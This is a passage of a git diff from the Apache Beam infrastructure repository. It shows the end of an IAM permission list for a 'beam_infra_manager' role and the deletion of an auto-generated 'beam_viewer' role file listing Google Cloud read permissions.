compute.targetSslProxies.setBackendService -- compute.targetSslProxies.setCertificateMap -- compute.targetSslProxies.setProxyHeader -- compute.targetSslProxies.setSslCertificates -- compute.targetSslProxies.setSslPolicy -- compute.targetSslProxies.update -- compute.targetSslProxies.use -- compute.targetTcpProxies.create -- compute.targetTcpProxies.update -- compute.targetTcpProxies.use -- compute.targetVpnGateways.create -- compute.targetVpnGateways.use -- compute.vpnGateways.create -- compute.vpnGateways.setLabels -- compute.vpnGateways.use -- compute.vpnTunnels.create -- compute.wireGroups.create -- compute.wireGroups.update -- container.clusters.create -- container.clusters.getCredentials -- container.clusters.update -- container.controllerRevisions.create -- container.controllerRevisions.update -- container.mutatingWebhookConfigurations.create -- container.mutatingWebhookConfigurations.update -- container.podSecurityPolicies.create -- container.podSecurityPolicies.update -- container.validatingWebhookConfigurations.create -- container.validatingWebhookConfigurations.update -- containeranalysis.notes.attachOccurrence -- containeranalysis.notes.create -- containeranalysis.notes.listOccurrences -- containeranalysis.notes.update -- containeranalysis.occurrences.create -- containeranalysis.occurrences.update -- containersecurity.clusterSummaries.list -- containersecurity.findings.list -- dataflow.jobs.create -- dataflow.jobs.snapshot -- dataflow.jobs.updateContents -- dataflow.shuffle.read -- dataflow.shuffle.write -- dataflow.streamingWorkItems.ImportState -- dataflow.streamingWorkItems.commitWork -- dataflow.streamingWorkItems.getData -- dataflow.streamingWorkItems.getWork -- dataflow.streamingWorkItems.getWorkerMetadata -- dataflow.workItems.lease -- dataflow.workItems.sendMessage -- dataflow.workItems.update -- dataform.commentThreads.create -- dataform.commentThreads.update -- dataform.comments.create -- dataform.comments.update -- dataform.compilationResults.create -- dataform.config.update -- dataform.releaseConfigs.create -- dataform.releaseConfigs.update -- dataform.repositories.commit -- dataform.repositories.update -- dataform.workflowConfigs.create -- dataform.workflowConfigs.update -- dataform.workflowInvocations.create -- dataform.workspaces.commit -- dataform.workspaces.create -- dataform.workspaces.installNpmPackages -- dataform.workspaces.makeDirectory -- dataform.workspaces.moveDirectory -- dataform.workspaces.moveFile -- dataform.workspaces.pull -- dataform.workspaces.push -- dataform.workspaces.removeDirectory -- dataform.workspaces.removeFile -- dataform.workspaces.reset -- dataform.workspaces.writeFile -- dataplex.aspectTypes.create -- dataplex.aspectTypes.update -- dataplex.aspectTypes.use -- dataplex.assets.create -- dataplex.assets.update -- dataplex.content.create -- dataplex.content.update -- dataplex.dataAttributeBindings.create -- dataplex.dataAttributeBindings.update -- dataplex.dataAttributes.bind -- dataplex.dataAttributes.create -- dataplex.dataAttributes.update -- dataplex.dataTaxonomies.configureDataAccess -- dataplex.dataTaxonomies.configureResourceAccess -- dataplex.dataTaxonomies.create -- dataplex.dataTaxonomies.update -- dataplex.datascans.create -- dataplex.datascans.run -- dataplex.datascans.update -- dataplex.entities.create -- dataplex.entities.update -- dataplex.entries.create -- dataplex.entries.link -- dataplex.entries.update -- dataplex.entryGroups.create -- dataplex.entryGroups.import -- dataplex.entryGroups.update -- dataplex.entryGroups.useContactsAspect -- dataplex.entryGroups.useDataQualityScorecardAspect -- dataplex.entryGroups.useDefinitionEntryLink -- dataplex.entryGroups.useGenericAspect -- dataplex.entryGroups.useGenericEntry -- dataplex.entryGroups.useOverviewAspect -- dataplex.entryGroups.useRelatedEntryLink -- dataplex.entryGroups.useSchemaAspect -- dataplex.entryGroups.useSynonymEntryLink -- dataplex.entryLinks.create -- dataplex.entryLinks.reference -- dataplex.entryTypes.create -- dataplex.entryTypes.update -- dataplex.entryTypes.use -- dataplex.environments.create -- dataplex.environments.execute -- dataplex.environments.update -- dataplex.glossaries.create -- dataplex.glossaries.import -- dataplex.glossaries.update -- dataplex.glossaryCategories.create -- dataplex.glossaryCategories.update -- dataplex.glossaryTerms.create -- dataplex.glossaryTerms.update -- dataplex.glossaryTerms.use -- dataplex.lakes.create -- dataplex.lakes.update -- dataplex.metadataJobs.create -- dataplex.partitions.create -- dataplex.partitions.update -- dataplex.tasks.create -- dataplex.tasks.run -- dataplex.tasks.update -- dataplex.zones.create -- dataplex.zones.update -- dataproc.agents.create -- dataproc.agents.update -- dataproc.autoscalingPolicies.create -- dataproc.autoscalingPolicies.update -- dataproc.batches.analyze -- dataproc.batches.create -- dataproc.batches.sparkApplicationWrite -- dataproc.clusters.create -- dataproc.clusters.start -- dataproc.clusters.update -- dataproc.clusters.use -- dataproc.jobs.create -- dataproc.jobs.update -- dataproc.nodeGroups.create -- dataproc.nodeGroups.update -- dataproc.sessionTemplates.create -- dataproc.sessionTemplates.update -- dataproc.sessions.create -- dataproc.sessions.sparkApplicationWrite -- dataproc.tasks.lease -- dataproc.tasks.reportStatus -- dataproc.workflowTemplates.create -- dataproc.workflowTemplates.instantiate -- dataproc.workflowTemplates.instantiateInline -- dataproc.workflowTemplates.update -- dataprocessing.datasources.update -- dataprocrm.nodePools.create -- dataprocrm.nodePools.deleteNodes -- dataprocrm.nodePools.resize -- dataprocrm.nodes.heartbeat -- dataprocrm.nodes.update -- dataprocrm.workloads.create -- datastore.backupSchedules.create -- datastore.backupSchedules.update -- datastore.databases.update -- datastore.indexes.create -- datastore.indexes.update -- datastore.userCreds.create -- datastore.userCreds.update -- dns.changes.create -- dns.gkeClusters.bindDNSResponsePolicy -- dns.gkeClusters.bindPrivateDNSZone -- dns.managedZones.create -- dns.managedZones.update -- dns.networks.bindDNSResponsePolicy -- dns.networks.bindPrivateDNSPolicy -- dns.networks.bindPrivateDNSZone -- dns.networks.targetWithPeeringZone -- dns.networks.useHealthSignals -- dns.policies.create -- dns.policies.update -- dns.resourceRecordSets.create -- dns.resourceRecordSets.update -- dns.responsePolicies.create -- dns.responsePolicies.update -- dns.responsePolicyRules.create -- dns.responsePolicyRules.update -- firebase.clients.create -- firebase.clients.undelete -- firebase.clients.update -- firebase.projects.update -- firebaseabt.experiments.create -- firebaseabt.experiments.update -- firebaseanalytics.resources.googleAnalyticsEdit -- firebaseappcheck.appAttestConfig.update -- firebaseappcheck.automations.create -- firebaseappcheck.automations.resume -- firebaseappcheck.automations.suspend -- firebaseappcheck.automations.update -- firebaseappcheck.debugTokens.update -- firebaseappcheck.deviceCheckConfig.update -- firebaseappcheck.playIntegrityConfig.update -- firebaseappcheck.recaptchaEnterpriseConfig.update -- firebaseappcheck.recaptchaV3Config.update -- firebaseappcheck.resourcePolicies.update -- firebaseappcheck.safetyNetConfig.update -- firebaseappcheck.services.update -- firebaseappdistro.groups.update -- firebaseappdistro.releases.update -- firebaseappdistro.testers.update -- firebaseauth.configs.create -- firebaseauth.configs.getHashConfig -- firebaseauth.configs.getSecret -- firebaseauth.configs.update -- firebaseauth.users.create -- firebaseauth.users.createSession -- firebaseauth.users.sendEmail -- firebaseauth.users.update -- firebasecrash.issues.update -- firebasecrashlytics.config.update -- firebasecrashlytics.issues.update -- firebasedatabase.instances.create -- firebasedatabase.instances.disable -- firebasedatabase.instances.reenable -- firebasedatabase.instances.undelete -- firebasedatabase.instances.update -- firebasedataconnect.connectors.create -- firebasedataconnect.connectors.update -- firebasedataconnect.schemas.create -- firebasedataconnect.schemas.update -- firebasedataconnect.services.create -- firebasedataconnect.services.executeGraphql -- firebasedataconnect.services.executeGraphqlRead -- firebasedataconnect.services.update -- firebasedynamiclinks.domains.create -- firebasedynamiclinks.domains.update -- firebasedynamiclinks.links.create -- firebasedynamiclinks.links.update -- firebaseextensionspublisher.extensions.create -- firebasehosting.sites.create -- firebasehosting.sites.update -- firebaseinappmessaging.campaigns.create -- firebaseinappmessaging.campaigns.update -- firebasemessagingcampaigns.campaigns.create -- firebasemessagingcampaigns.campaigns.start -- firebasemessagingcampaigns.campaigns.update -- firebaseml.models.create -- firebaseml.models.update -- firebaseml.modelversions.create -- firebaseml.modelversions.update -- firebasenotifications.messages.create -- firebasenotifications.messages.update -- firebaseperformance.config.update -- firebaserules.releases.create -- firebaserules.releases.update -- firebaserules.rulesets.create -- firebaserules.rulesets.get -- firebasestorage.buckets.addFirebase -- firebasestorage.buckets.removeFirebase -- firebasestorage.defaultBucket.create -- firebasevertexai.configs.update -- iam.serviceAccountApiKeyBindings.create -- iam.serviceAccountApiKeyBindings.undelete -- iam.serviceAccountKeys.create -- iam.serviceAccountKeys.disable -- iam.serviceAccountKeys.enable -- iam.serviceAccounts.actAs -- iam.serviceAccounts.create -- iam.serviceAccounts.disable -- iam.serviceAccounts.enable -- iam.serviceAccounts.getAccessToken -- iam.serviceAccounts.getOpenIdToken -- iam.serviceAccounts.implicitDelegation -- iam.serviceAccounts.signBlob -- iam.serviceAccounts.signJwt -- iam.serviceAccounts.update -- iap.tunnelDestGroups.create -- iap.tunnelDestGroups.update -- monitoring.alertPolicies.create -- monitoring.alertPolicies.update -- monitoring.dashboards.create -- monitoring.dashboards.update -- monitoring.groups.create -- monitoring.groups.update -- monitoring.metricDescriptors.create -- monitoring.services.create -- monitoring.services.update -- monitoring.slos.create -- monitoring.slos.update -- monitoring.snoozes.create -- monitoring.snoozes.update -- monitoring.timeSeries.create -- monitoring.uptimeCheckConfigs.create -- monitoring.uptimeCheckConfigs.update -- pubsub.schemas.commit -- pubsub.schemas.create -- pubsub.schemas.rollback -- pubsub.snapshots.create -- pubsub.subscriptions.consume -- pubsub.subscriptions.create -- pubsub.subscriptions.update -- pubsub.topics.attachSubscription -- pubsub.topics.create -- pubsub.topics.detachSubscription -- pubsub.topics.publish -- pubsub.topics.update -- pubsub.topics.updateTag -- pubsublite.reservations.attachTopic -- pubsublite.reservations.create -- pubsublite.reservations.update -- pubsublite.subscriptions.create -- pubsublite.subscriptions.seek -- pubsublite.subscriptions.setCursor -- pubsublite.subscriptions.update -- pubsublite.topics.create -- pubsublite.topics.publish -- pubsublite.topics.update -- redis.backupCollections.create -- redis.backups.create -- redis.clusters.backup -- redis.clusters.connect -- redis.clusters.create -- redis.clusters.update -- redis.instances.create -- redis.instances.export -- redis.instances.failover -- redis.instances.getAuthString -- redis.instances.import -- redis.instances.rescheduleMaintenance -- redis.instances.update -- redis.instances.updateAuth -- redis.instances.upgrade -- resourcemanager.hierarchyNodes.createTagBinding -- resourcemanager.hierarchyNodes.deleteTagBinding -- resourcemanager.projects.move -- resourcemanager.projects.update -- resourcemanager.tagHolds.create -- resourcemanager.tagKeys.create -- resourcemanager.tagKeys.update -- resourcemanager.tagValueBindings.create -- resourcemanager.tagValues.create -- resourcemanager.tagValues.update -- secretmanager.secrets.create -- secretmanager.secrets.update -- secretmanager.versions.add -- secretmanager.versions.disable -- secretmanager.versions.enable -- servicemanagement.services.bind -- servicemanagement.services.check -- servicemanagement.services.create -- servicemanagement.services.quota -- servicemanagement.services.report -- servicemanagement.services.update -- serviceusage.services.disable -- serviceusage.services.enable -- serviceusage.services.use -- spanner.backupSchedules.create -- spanner.backupSchedules.update -- spanner.backups.copy -- spanner.backups.create -- spanner.backups.restoreDatabase -- spanner.backups.update -- spanner.databases.adapt -- spanner.databases.addSplitPoints -- spanner.databases.beginOrRollbackReadWriteTransaction -- spanner.databases.beginPartitionedDmlTransaction -- spanner.databases.changequorum -- spanner.databases.create -- spanner.databases.createBackup -- spanner.databases.drop -- spanner.databases.update -- spanner.databases.updateDdl -- spanner.databases.useRoleBasedAccess -- spanner.databases.write -- spanner.instanceConfigs.create -- spanner.instanceConfigs.update -- spanner.instancePartitions.create -- spanner.instancePartitions.update -- spanner.instances.create -- spanner.instances.update -- storage.buckets.create -- storage.folders.create -- storage.folders.rename -- storage.hmacKeys.create -- storage.hmacKeys.update -- storage.managedFolders.create -- storage.managedFolders.get -- storage.managedFolders.list -- storage.multipartUploads.abort -- storage.multipartUploads.create -- storage.multipartUploads.listParts -- storage.objects.create -- storage.objects.get -- storage.objects.list -- storageinsights.datasetConfigs.create -- storageinsights.datasetConfigs.linkDataset -- storageinsights.datasetConfigs.unlinkDataset -- storageinsights.datasetConfigs.update -- storageinsights.reportConfigs.create -- storageinsights.reportConfigs.update -- storagetransfer.agentpools.create -- storagetransfer.agentpools.update -- storagetransfer.jobs.create -- storagetransfer.jobs.run -- storagetransfer.jobs.update -- storagetransfer.operations.pause -- storagetransfer.operations.resume -role_id: beam_infra_manager -stage: GA -title: beam_infra_manager diff --git a/infra/iam/roles/beam_viewer.role.yaml b/infra/iam/roles/beam_viewer.role.yaml deleted file mode 100644 index 0525fda09560..000000000000 --- a/infra/iam/roles/beam_viewer.role.yaml +++ /dev/null @@ -1,1113 +0,0 @@ -# Licensed to the Apache Software Foundation (ASF) under one or more -# contributor license agreements. See the NOTICE file distributed with -# this work for additional information regarding copyright ownership. -# The ASF licenses this file to You under the Apache License, Version 2.0 -# (the "License"); you may not use this file except in compliance with -# the License. You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -# This file is auto-generated by generate_roles.py. -# Do not edit manually. - -# This file was generated on 2025-08-11 14:34:54 UTC - -description: This is the beam_viewer role -permissions: -- artifactregistry.attachments.get -- artifactregistry.attachments.list -- artifactregistry.dockerimages.get -- artifactregistry.dockerimages.list -- artifactregistry.files.download -- artifactregistry.files.get -- artifactregistry.files.list -- artifactregistry.locations.get -- artifactregistry.locations.list -- artifactregistry.mavenartifacts.get -- artifactregistry.mavenartifacts.list -- artifactregistry.npmpackages.get -- artifactregistry.npmpackages.list -- artifactregistry.packages.get -- artifactregistry.packages.list -- artifactregistry.projectsettings.get -- artifactregistry.pythonpackages.get -- artifactregistry.pythonpackages.list -- artifactregistry.repositories.downloadArtifacts -- artifactregistry.repositories.get -- artifactregistry.repositories.getIamPolicy -- artifactregistry.repositories.list -- artifactregistry.repositories.listEffectiveTags -- artifactregistry.repositories.listTagBindings -- artifactregistry.repositories.readViaVirtualRepository -- artifactregistry.rules.get -- artifactregistry.rules.list -- artifactregistry.tags.get -- artifactregistry.tags.list -- artifactregistry.versions.get -- artifactregistry.versions.list -- biglake.catalogs.get -- biglake.catalogs.getIamPolicy -- biglake.catalogs.list -- biglake.databases.get -- biglake.databases.list -- biglake.locks.list -- biglake.namespaces.get -- biglake.namespaces.getIamPolicy -- biglake.namespaces.list -- biglake.tables.get -- biglake.tables.getData -- biglake.tables.getIamPolicy -- biglake.tables.list -- bigquery.bireservations.get -- bigquery.capacityCommitments.get -- bigquery.capacityCommitments.list -- bigquery.config.get -- bigquery.connections.get -- bigquery.connections.getIamPolicy -- bigquery.connections.list -- bigquery.connections.use -- bigquery.dataPolicies.get -- bigquery.dataPolicies.getIamPolicy -- bigquery.dataPolicies.list -- bigquery.datasets.get -- bigquery.datasets.getIamPolicy -- bigquery.datasets.listEffectiveTags -- bigquery.datasets.listTagBindings -- bigquery.jobs.create -- bigquery.jobs.get -- bigquery.jobs.list -- bigquery.jobs.listExecutionMetadata -- bigquery.models.export -- bigquery.models.getData -- bigquery.models.getMetadata -- bigquery.models.list -- bigquery.objectRefs.read -- bigquery.readsessions.create -- bigquery.readsessions.getData -- bigquery.readsessions.update -- bigquery.reservationAssignments.list -- bigquery.reservationAssignments.search -- bigquery.reservationGroups.get -- bigquery.reservationGroups.list -- bigquery.reservations.get -- bigquery.reservations.list -- bigquery.reservations.listFailoverDatasets -- bigquery.reservations.use -- bigquery.routines.get -- bigquery.routines.list -- bigquery.rowAccessPolicies.get -- bigquery.rowAccessPolicies.getIamPolicy -- bigquery.rowAccessPolicies.list -- bigquery.savedqueries.get -- bigquery.savedqueries.list -- bigquery.tables.createSnapshot -- bigquery.tables.getIamPolicy -- bigquery.tables.listEffectiveTags -- bigquery.tables.listTagBindings -- bigquery.tables.replicateData -- bigquery.transfers.get -- bigquerymigration.subtasks.get -- bigquerymigration.subtasks.list -- bigquerymigration.workflows.get -- bigquerymigration.workflows.list -- cloudasset.assets.analyzeIamPolicy -- cloudasset.assets.analyzeMove -- cloudasset.assets.analyzeOrgPolicy -- cloudasset.assets.exportAppengineApplications -- cloudasset.assets.exportAppengineServices -- cloudasset.assets.exportAppengineVersions -- cloudasset.assets.exportBigqueryDatasets -- cloudasset.assets.exportBigqueryModels -- cloudasset.assets.exportBigqueryTables -- cloudasset.assets.exportCloudDocumentAIEvaluation -- cloudasset.assets.exportCloudDocumentAIHumanReviewConfig -- cloudasset.assets.exportCloudDocumentAILabelerPool -- cloudasset.assets.exportCloudDocumentAIProcessor -- cloudasset.assets.exportCloudDocumentAIProcessorVersion -- cloudasset.assets.exportCloudbillingBillingAccounts -- cloudasset.assets.exportCloudkmsCryptoKeyVersions -- cloudasset.assets.exportCloudkmsCryptoKeys -- cloudasset.assets.exportCloudkmsKeyRings -- cloudasset.assets.exportCloudmemcacheInstances -- cloudasset.assets.exportCloudresourcemanagerFolders -- cloudasset.assets.exportCloudresourcemanagerOrganizations -- cloudasset.assets.exportCloudresourcemanagerProjects -- cloudasset.assets.exportCloudresourcemanagerTagBindings -- cloudasset.assets.exportCloudresourcemanagerTagKeys -- cloudasset.assets.exportCloudresourcemanagerTagValues -- cloudasset.assets.exportComputeAddress -- cloudasset.assets.exportComputeAutoscalers -- cloudasset.assets.exportComputeBackendBuckets -- cloudasset.assets.exportComputeBackendServices -- cloudasset.assets.exportComputeDisks -- cloudasset.assets.exportComputeFirewalls -- cloudasset.assets.exportComputeForwardingRules -- cloudasset.assets.exportComputeGlobalForwardingRules -- cloudasset.assets.exportComputeHealthChecks -- cloudasset.assets.exportComputeHttpHealthChecks -- cloudasset.assets.exportComputeHttpsHealthChecks -- cloudasset.assets.exportComputeImages -- cloudasset.assets.exportComputeInstanceGroupManagers -- cloudasset.assets.exportComputeInstanceGroups -- cloudasset.assets.exportComputeInstanceTemplates -- cloudasset.assets.exportComputeInstances -- cloudasset.assets.exportComputeInterconnect -- cloudasset.assets.exportComputeInterconnectAttachment -- cloudasset.assets.exportComputeLicenses -- cloudasset.assets.exportComputeNetworkEndpointGroups -- cloudasset.assets.exportComputeNetworks -- cloudasset.assets.exportComputeProjects -- cloudasset.assets.exportComputeRegionBackendServices -- cloudasset.assets.exportComputeRouters -- cloudasset.assets.exportComputeRoutes -- cloudasset.assets.exportComputeSecurityPolicy -- cloudasset.assets.exportComputeSnapshots -- cloudasset.assets.exportComputeSslCertificates -- cloudasset.assets.exportComputeSslPolicies -- cloudasset.assets.exportComputeSubnetworks -- cloudasset.assets.exportComputeTargetHttpProxies -- cloudasset.assets.exportComputeTargetHttpsProxies -- cloudasset.assets.exportComputeTargetInstances -- cloudasset.assets.exportComputeTargetPools -- cloudasset.assets.exportComputeTargetSslProxies -- cloudasset.assets.exportComputeTargetTcpProxies -- cloudasset.assets.exportComputeTargetVpnGateways -- cloudasset.assets.exportComputeUrlMaps -- cloudasset.assets.exportComputeVpnTunnels -- cloudasset.assets.exportContainerClusters -- cloudasset.assets.exportDataprocClusters -- cloudasset.assets.exportDataprocJobs -- cloudasset.assets.exportDnsManagedZones -- cloudasset.assets.exportDnsPolicies -- cloudasset.assets.exportIamRoles -- cloudasset.assets.exportIamServiceAccountKeys -- cloudasset.assets.exportIamServiceAccounts -- cloudasset.assets.exportOSConfigOSPolicyAssignmentReports -- cloudasset.assets.exportOSConfigOSPolicyAssignments -- cloudasset.assets.exportPubsubSnapshots -- cloudasset.assets.exportPubsubSubscriptions -- cloudasset.assets.exportPubsubTopics -- cloudasset.assets.exportServicemanagementServices -- cloudasset.assets.exportSpannerBackups -- cloudasset.assets.exportSpannerDatabases -- cloudasset.assets.exportSpannerInstances -- cloudasset.assets.exportSqladminBackupRuns -- cloudasset.assets.exportSqladminInstances -- cloudasset.assets.exportStorageBuckets -- cloudasset.assets.listCloudDocumentAIEvaluation -- cloudasset.assets.listCloudDocumentAIHumanReviewConfig -- cloudasset.assets.listCloudDocumentAILabelerPool -- cloudasset.assets.listCloudDocumentAIProcessor -- cloudasset.assets.listCloudDocumentAIProcessorVersion -- cloudasset.assets.listSqladminBackupRuns -- cloudasset.assets.searchAllIamPolicies -- cloudasset.assets.searchAllResources -- cloudasset.othercloudconnections.get -- cloudasset.othercloudconnections.list -- cloudasset.savedqueries.get -- cloudasset.savedqueries.list -- cloudbuild.builds.get -- cloudbuild.builds.list -- cloudbuild.connections.fetchLinkableRepositories -- cloudbuild.connections.get -- cloudbuild.connections.getIamPolicy -- cloudbuild.connections.list -- cloudbuild.integrations.get -- cloudbuild.integrations.list -- cloudbuild.locations.get -- cloudbuild.locations.list -- cloudbuild.operations.get -- cloudbuild.operations.list -- cloudbuild.repositories.fetchGitRefs -- cloudbuild.repositories.get -- cloudbuild.repositories.list -- cloudbuild.workerpools.get -- cloudbuild.workerpools.list -- cloudfunctions.functions.get -- cloudfunctions.functions.getIamPolicy -- cloudfunctions.functions.list -- cloudfunctions.functions.sourceCodeGet -- cloudfunctions.locations.list -- cloudfunctions.operations.get -- cloudfunctions.operations.list -- cloudsql.backupRuns.export -- cloudsql.backupRuns.get -- cloudsql.backupRuns.list -- cloudsql.databases.get -- cloudsql.databases.list -- cloudsql.instances.createBackupDrBackup -- cloudsql.instances.export -- cloudsql.instances.get -- cloudsql.instances.getDiskShrinkConfig -- cloudsql.instances.list -- cloudsql.instances.listEffectiveTags -- cloudsql.instances.listServerCas -- cloudsql.instances.listServerCertificates -- cloudsql.instances.listTagBindings -- cloudsql.schemas.view -- cloudsql.sslCerts.get -- cloudsql.sslCerts.list -- cloudsql.users.get -- cloudsql.users.list -- compute.acceleratorTypes.get -- compute.acceleratorTypes.list -- compute.addresses.get -- compute.addresses.list -- compute.addresses.listEffectiveTags -- compute.addresses.listTagBindings -- compute.autoscalers.get -- compute.autoscalers.list -- compute.backendBuckets.get -- compute.backendBuckets.getIamPolicy -- compute.backendBuckets.list -- compute.backendBuckets.listEffectiveTags -- compute.backendBuckets.listTagBindings -- compute.backendServices.get -- compute.backendServices.getIamPolicy -- compute.backendServices.list -- compute.backendServices.listEffectiveTags -- compute.backendServices.listTagBindings -- compute.commitments.get -- compute.commitments.list -- compute.crossSiteNetworks.get -- compute.crossSiteNetworks.list -- compute.diskSettings.get -- compute.diskTypes.get -- compute.diskTypes.list -- compute.disks.createSnapshot -- compute.disks.get -- compute.disks.getIamPolicy -- compute.disks.list -- compute.disks.listEffectiveTags -- compute.disks.listTagBindings -- compute.disks.useReadOnly -- compute.externalVpnGateways.get -- compute.externalVpnGateways.list -- compute.externalVpnGateways.listEffectiveTags -- compute.externalVpnGateways.listTagBindings -- compute.firewallPolicies.get -- compute.firewallPolicies.getIamPolicy -- compute.firewallPolicies.list -- compute.firewallPolicies.listEffectiveTags -- compute.firewallPolicies.listTagBindings -- compute.firewalls.get -- compute.firewalls.list -- compute.firewalls.listEffectiveTags -- compute.firewalls.listTagBindings -- compute.forwardingRules.get -- compute.forwardingRules.list -- compute.forwardingRules.listEffectiveTags -- compute.forwardingRules.listTagBindings -- compute.futureReservations.get -- compute.futureReservations.getIamPolicy -- compute.futureReservations.list -- compute.globalAddresses.get -- compute.globalAddresses.list -- compute.globalAddresses.listEffectiveTags -- compute.globalAddresses.listTagBindings -- compute.globalForwardingRules.get -- compute.globalForwardingRules.list -- compute.globalForwardingRules.listEffectiveTags -- compute.globalForwardingRules.listTagBindings -- compute.globalNetworkEndpointGroups.get -- compute.globalNetworkEndpointGroups.list -- compute.globalNetworkEndpointGroups.listEffectiveTags -- compute.globalNetworkEndpointGroups.listTagBindings -- compute.globalOperations.get -- compute.globalOperations.list -- compute.globalPublicDelegatedPrefixes.get -- compute.globalPublicDelegatedPrefixes.list -- compute.healthChecks.get -- compute.healthChecks.list -- compute.healthChecks.listEffectiveTags -- compute.healthChecks.listTagBindings -- compute.healthChecks.useReadOnly -- compute.httpHealthChecks.get -- compute.httpHealthChecks.list -- compute.httpHealthChecks.listEffectiveTags -- compute.httpHealthChecks.listTagBindings -- compute.httpHealthChecks.useReadOnly -- compute.httpsHealthChecks.get -- compute.httpsHealthChecks.list -- compute.httpsHealthChecks.listEffectiveTags -- compute.httpsHealthChecks.listTagBindings -- compute.httpsHealthChecks.useReadOnly -- compute.images.get -- compute.images.getFromFamily -- compute.images.getIamPolicy -- compute.images.list -- compute.images.listEffectiveTags -- compute.images.listTagBindings -- compute.images.useReadOnly -- compute.instanceGroupManagers.get -- compute.instanceGroupManagers.list -- compute.instanceGroupManagers.listEffectiveTags -- compute.instanceGroupManagers.listTagBindings -- compute.instanceGroups.get -- compute.instanceGroups.list -- compute.instanceGroups.listEffectiveTags -- compute.instanceGroups.listTagBindings -- compute.instanceSettings.get -- compute.instanceTemplates.get -- compute.instanceTemplates.getIamPolicy -- compute.instanceTemplates.list -- compute.instanceTemplates.useReadOnly -- compute.instances.get -- compute.instances.getEffectiveFirewalls -- compute.instances.getIamPolicy -- compute.instances.getScreenshot -- compute.instances.getSerialPortOutput -- compute.instances.getShieldedInstanceIdentity -- compute.instances.getShieldedVmIdentity -- compute.instances.list -- compute.instances.listEffectiveTags -- compute.instances.listReferrers -- compute.instances.listTagBindings -- compute.instances.useReadOnly -- compute.instantSnapshots.get -- compute.instantSnapshots.getIamPolicy -- compute.instantSnapshots.list -- compute.instantSnapshots.useReadOnly -- compute.interconnectAttachmentGroups.get -- compute.interconnectAttachmentGroups.list -- compute.interconnectAttachments.listEffectiveTags -- compute.interconnectAttachments.listTagBindings -- compute.interconnectGroups.get -- compute.interconnectGroups.list -- compute.interconnectRemoteLocations.get -- compute.interconnectRemoteLocations.list -- compute.interconnects.listEffectiveTags -- compute.interconnects.listTagBindings -- compute.licenseCodes.getIamPolicy -- compute.licenses.get -- compute.licenses.getIamPolicy -- compute.machineImages.get -- compute.machineImages.getIamPolicy -- compute.machineImages.list -- compute.machineImages.useReadOnly -- compute.machineTypes.get -- compute.machineTypes.list -- compute.multiMig.get -- compute.multiMig.list -- compute.multiMigMembers.get -- compute.multiMigMembers.list -- compute.networkAttachments.get -- compute.networkAttachments.getIamPolicy -- compute.networkAttachments.list -- compute.networkAttachments.listEffectiveTags -- compute.networkAttachments.listTagBindings -- compute.networkEdgeSecurityServices.get -- compute.networkEdgeSecurityServices.list -- compute.networkEdgeSecurityServices.listEffectiveTags -- compute.networkEdgeSecurityServices.listTagBindings -- compute.networkEndpointGroups.get -- compute.networkEndpointGroups.list -- compute.networkEndpointGroups.listEffectiveTags -- compute.networkEndpointGroups.listTagBindings -- compute.networkProfiles.get -- compute.networkProfiles.list -- compute.networks.get -- compute.networks.getEffectiveFirewalls -- compute.networks.getRegionEffectiveFirewalls -- compute.networks.list -- compute.networks.listEffectiveTags -- compute.networks.listPeeringRoutes -- compute.networks.listTagBindings -- compute.nodeGroups.get -- compute.nodeGroups.getIamPolicy -- compute.nodeGroups.list -- compute.nodeTemplates.get -- compute.nodeTemplates.getIamPolicy -- compute.nodeTemplates.list -- compute.nodeTypes.get -- compute.nodeTypes.list -- compute.organizations.listAssociations -- compute.packetMirrorings.get -- compute.packetMirrorings.list -- compute.packetMirrorings.listEffectiveTags -- compute.packetMirrorings.listTagBindings -- compute.previewFeatures.get -- compute.previewFeatures.list -- compute.projects.get -- compute.publicAdvertisedPrefixes.get -- compute.publicAdvertisedPrefixes.list -- compute.publicDelegatedPrefixes.get -- compute.publicDelegatedPrefixes.list -- compute.publicDelegatedPrefixes.listEffectiveTags -- compute.publicDelegatedPrefixes.listTagBindings -- compute.regionBackendServices.get -- compute.regionBackendServices.getIamPolicy -- compute.regionBackendServices.list -- compute.regionBackendServices.listEffectiveTags -- compute.regionBackendServices.listTagBindings -- compute.regionFirewallPolicies.get -- compute.regionFirewallPolicies.getIamPolicy -- compute.regionFirewallPolicies.list -- compute.regionFirewallPolicies.listEffectiveTags -- compute.regionFirewallPolicies.listTagBindings -- compute.regionHealthCheckServices.get -- compute.regionHealthCheckServices.list -- compute.regionHealthChecks.get -- compute.regionHealthChecks.list -- compute.regionHealthChecks.listEffectiveTags -- compute.regionHealthChecks.listTagBindings -- compute.regionHealthChecks.useReadOnly -- compute.regionNetworkEndpointGroups.get -- compute.regionNetworkEndpointGroups.list -- compute.regionNetworkEndpointGroups.listEffectiveTags -- compute.regionNetworkEndpointGroups.listTagBindings -- compute.regionNotificationEndpoints.get -- compute.regionNotificationEndpoints.list -- compute.regionOperations.get -- compute.regionOperations.list -- compute.regionSecurityPolicies.get -- compute.regionSecurityPolicies.list -- compute.regionSecurityPolicies.listEffectiveTags -- compute.regionSecurityPolicies.listTagBindings -- compute.regionSslCertificates.get -- compute.regionSslCertificates.list -- compute.regionSslCertificates.listEffectiveTags -- compute.regionSslCertificates.listTagBindings -- compute.regionSslPolicies.get -- compute.regionSslPolicies.list -- compute.regionSslPolicies.listAvailableFeatures -- compute.regionSslPolicies.listEffectiveTags -- compute.regionSslPolicies.listTagBindings -- compute.regionTargetHttpProxies.get -- compute.regionTargetHttpProxies.list -- compute.regionTargetHttpProxies.listEffectiveTags -- compute.regionTargetHttpProxies.listTagBindings -- compute.regionTargetHttpsProxies.get -- compute.regionTargetHttpsProxies.list -- compute.regionTargetHttpsProxies.listEffectiveTags -- compute.regionTargetHttpsProxies.listTagBindings -- compute.regionTargetTcpProxies.get -- compute.regionTargetTcpProxies.list -- compute.regionTargetTcpProxies.listEffectiveTags -- compute.regionTargetTcpProxies.listTagBindings -- compute.regionUrlMaps.get -- compute.regionUrlMaps.list -- compute.regionUrlMaps.listEffectiveTags -- compute.regionUrlMaps.listTagBindings -- compute.regionUrlMaps.validate -- compute.regions.get -- compute.regions.list -- compute.reservationBlocks.get -- compute.reservationBlocks.list -- compute.reservationSubBlocks.get -- compute.reservationSubBlocks.list -- compute.reservations.get -- compute.reservations.list -- compute.resourcePolicies.get -- compute.resourcePolicies.getIamPolicy -- compute.resourcePolicies.list -- 